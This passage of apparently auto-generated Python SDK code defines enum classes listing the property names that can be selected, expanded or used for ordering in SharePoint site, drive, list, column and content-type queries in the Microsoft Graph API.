SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum129(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum130(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum131(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum132(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Enum133(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum134(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum135(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Enum65(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum66(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum68(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum69(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum70(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum71(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
BOOLEAN = "boolean"
BOOLEAN_DESC = "boolean desc"
CALCULATED = "calculated"
CALCULATED_DESC = "calculated desc"
CHOICE = "choice"
CHOICE_DESC = "choice desc"
COLUMN_GROUP = "columnGroup"
COLUMN_GROUP_DESC = "columnGroup desc"
CURRENCY = "currency"
CURRENCY_DESC = "currency desc"
DATE_TIME = "dateTime"
DATE_TIME_DESC = "dateTime desc"
DEFAULT_VALUE = "defaultValue"
DEFAULT_VALUE_DESC = "defaultValue desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
ENFORCE_UNIQUE_VALUES_DESC = "enforceUniqueValues desc"
GEOLOCATION = "geolocation"
GEOLOCATION_DESC = "geolocation desc"
HIDDEN = "hidden"
HIDDEN_DESC = "hidden desc"
INDEXED = "indexed"
INDEXED_DESC = "indexed desc"
LOOKUP = "lookup"
LOOKUP_DESC = "lookup desc"
NAME = "name"
NAME_DESC = "name desc"
NUMBER = "number"
NUMBER_DESC = "number desc"
PERSON_OR_GROUP = "personOrGroup"
PERSON_OR_GROUP_DESC = "personOrGroup desc"
READ_ONLY = "readOnly"
READ_ONLY_DESC = "readOnly desc"
REQUIRED = "required"
REQUIRED_DESC = "required desc"
TEXT = "text"
TEXT_DESC = "text desc"
class Enum72(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
BOOLEAN = "boolean"
CALCULATED = "calculated"
CHOICE = "choice"
COLUMN_GROUP = "columnGroup"
CURRENCY = "currency"
DATE_TIME = "dateTime"
DEFAULT_VALUE = "defaultValue"
DESCRIPTION = "description"
DISPLAY_NAME = "displayName"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
GEOLOCATION = "geolocation"
HIDDEN = "hidden"
INDEXED = "indexed"
LOOKUP = "lookup"
NAME = "name"
NUMBER = "number"
PERSON_OR_GROUP = "personOrGroup"
READ_ONLY = "readOnly"
REQUIRED = "required"
TEXT = "text"
class Enum73(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
BOOLEAN = "boolean"
CALCULATED = "calculated"
CHOICE = "choice"
COLUMN_GROUP = "columnGroup"
CURRENCY = "currency"
DATE_TIME = "dateTime"
DEFAULT_VALUE = "defaultValue"
DESCRIPTION = "description"
DISPLAY_NAME = "displayName"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
GEOLOCATION = "geolocation"
HIDDEN = "hidden"
INDEXED = "indexed"
LOOKUP = "lookup"
NAME = "name"
NUMBER = "number"
PERSON_OR_GROUP = "personOrGroup"
READ_ONLY = "readOnly"
REQUIRED = "required"
TEXT = "text"
class Enum74(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
GROUP = "group"
GROUP_DESC = "group desc"
HIDDEN = "hidden"
HIDDEN_DESC = "hidden desc"
INHERITED_FROM = "inheritedFrom"
INHERITED_FROM_DESC = "inheritedFrom desc"
NAME = "name"
NAME_DESC = "name desc"
ORDER = "order"
ORDER_DESC = "order desc"
PARENT_ID = "parentId"
PARENT_ID_DESC = "parentId desc"
READ_ONLY = "readOnly"
READ_ONLY_DESC = "readOnly desc"
SEALED = "sealed"
SEALED_DESC = "sealed desc"
class Enum75(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
DESCRIPTION = "description"
GROUP = "group"
HIDDEN = "hidden"
INHERITED_FROM = "inheritedFrom"
NAME = "name"
ORDER = "order"
PARENT_ID = "parentId"
READ_ONLY = "readOnly"
SEALED = "sealed"
COLUMN_LINKS = "columnLinks"
class Enum76(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
COLUMN_LINKS = "columnLinks"
class Enum77(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
DESCRIPTION = "description"
GROUP = "group"
HIDDEN = "hidden"
INHERITED_FROM = "inheritedFrom"
NAME = "name"
ORDER = "order"
PARENT_ID = "parentId"
READ_ONLY = "readOnly"
SEALED = "sealed"
COLUMN_LINKS = "columnLinks"
class Enum78(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
COLUMN_LINKS = "columnLinks"
class Enum79(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
NAME = "name"
NAME_DESC = "name desc"
class Enum80(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
NAME = "name"
class Enum81(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
NAME = "name"
class Enum82(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DRIVE_TYPE = "driveType"
OWNER = "owner"
QUOTA = "quota"
SHARE_POINT_IDS = "sharePointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum83(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum84(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DRIVE_TYPE = "driveType"
DRIVE_TYPE_DESC = "driveType desc"
OWNER = "owner"
OWNER_DESC = "owner desc"
QUOTA = "quota"
QUOTA_DESC = "quota desc"
SHARE_POINT_IDS = "sharePointIds"
SHARE_POINT_IDS_DESC = "sharePointIds desc"
SYSTEM = "system"
SYSTEM_DESC = "system desc"
class Enum85(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DRIVE_TYPE = "driveType"
OWNER = "owner"
QUOTA = "quota"
SHARE_POINT_IDS = "sharePointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum86(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum87(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DRIVE_TYPE = "driveType"
OWNER = "owner"
QUOTA = "quota"
SHARE_POINT_IDS = "sharePointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum88(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum89(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
LIST = "list"
LIST_DESC = "list desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SYSTEM = "system"
SYSTEM_DESC = "system desc"
class Enum90(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
LIST = "list"
SHAREPOINT_IDS = "sharepointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
ITEMS = "items"
SUBSCRIPTIONS = "subscriptions"
class Enum91(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
ITEMS = "items"
SUBSCRIPTIONS = "subscriptions"
class Enum92(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
LIST = "list"
SHAREPOINT_IDS = "sharepointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
ITEMS = "items"
SUBSCRIPTIONS = "subscriptions"
class Enum93(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
ITEMS = "items"
SUBSCRIPTIONS = "subscriptions"
class Enum94(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
BOOLEAN = "boolean"
BOOLEAN_DESC = "boolean desc"
CALCULATED = "calculated"
CALCULATED_DESC = "calculated desc"
CHOICE = "choice"
CHOICE_DESC = "choice desc"
COLUMN_GROUP = "columnGroup"
COLUMN_GROUP_DESC = "columnGroup desc"
CURRENCY = "currency"
CURRENCY_DESC = "currency desc"
DATE_TIME = "dateTime"
DATE_TIME_DESC = "dateTime desc"
DEFAULT_VALUE = "defaultValue"
DEFAULT_VALUE_DESC = "defaultValue desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
ENFORCE_UNIQUE_VALUES_DESC = "enforceUniqueValues desc"
GEOLOCATION = "geolocation"
GEOLOCATION_DESC = "geolocation desc"
HIDDEN = "hidden"
HIDDEN_DESC = "hidden desc"
INDEXED = "indexed"
INDEXED_DESC = "indexed desc"
LOOKUP = "lookup"
LOOKUP_DESC = "lookup desc"
NAME = "name"
NAME_DESC = "name desc"
NUMBER = "number"
NUMBER_DESC = "number desc"
PERSON_OR_GROUP = "personOrGroup"
PERSON_OR_GROUP_DESC = "personOrGroup desc"
READ_ONLY = "readOnly"
READ_ONLY_DESC = "readOnly desc"
REQUIRED = "required"
REQUIRED_DESC = "required desc"
TEXT = "text"
TEXT_DESC = "text desc"
class Enum95(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
BOOLEAN = "boolean"
CALCULATED = "calculated"
CHOICE = "choice"
COLUMN_GROUP = "columnGroup"
CURRENCY = "currency"
DATE_TIME = "dateTime"
DEFAULT_VALUE = "defaultValue"
DESCRIPTION = "description"
DISPLAY_NAME = "displayName"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
GEOLOCATION = "geolocation"
HIDDEN = "hidden"
INDEXED = "indexed"
LOOKUP = "lookup"
NAME = "name"
NUMBER = "number"
PERSON_OR_GROUP = "personOrGroup"
READ_ONLY = "readOnly"
REQUIRED = "required"
TEXT = "text"
class Enum96(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
BOOLEAN = "boolean"
CALCULATED = "calculated"
CHOICE = "choice"
COLUMN_GROUP = "columnGroup"
CURRENCY = "currency"
DATE_TIME = "dateTime"
DEFAULT_VALUE = "defaultValue"
DESCRIPTION = "description"
DISPLAY_NAME = "displayName"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
GEOLOCATION = "geolocation"
HIDDEN = "hidden"
INDEXED = "indexed"
LOOKUP = "lookup"
NAME = "name"
NUMBER = "number"
PERSON_OR_GROUP = "personOrGroup"
READ_ONLY = "readOnly"
REQUIRED = "required"
TEXT = "text"
class Enum97(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
GROUP = "group"
GROUP_DESC = "group desc"
HIDDEN = "hidden"
HIDDEN_DESC = "hidden desc"
INHERITED_FROM = "inheritedFrom"
INHERITED_FROM_DESC = "inheritedFrom desc"
NAME = "name"
NAME_DESC = "name desc"
ORDER = "order"
ORDER_DESC = "order desc"
PARENT_ID = "parentId"
PARENT_ID_DESC = "parentId desc"
READ_ONLY = "readOnly"
READ_ONLY_DESC = "readOnly desc"
SEALED = "sealed"
SEALED_DESC = "sealed desc"
class Enum98(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
DESCRIPTION = "description"
GROUP = "group"
HIDDEN = "hidden"
INHERITED_FROM = "inheritedFrom"
NAME = "name"
ORDER = "order"
PARENT_ID = "parentId"
READ_ONLY = "readOnly"
SEALED = "sealed"
COLUMN_LINKS = "columnLinks"
class Enum99(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
COLUMN_LINKS = "columnLinks"
class Get1ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Get2ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Get3ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Get5ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Get6ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Get7ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
